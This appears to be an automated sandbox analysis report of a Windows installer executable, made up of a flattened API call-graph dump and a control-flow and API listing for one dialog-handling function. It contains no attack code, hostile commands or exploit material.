3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                        Executed Functions

                                                                        Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
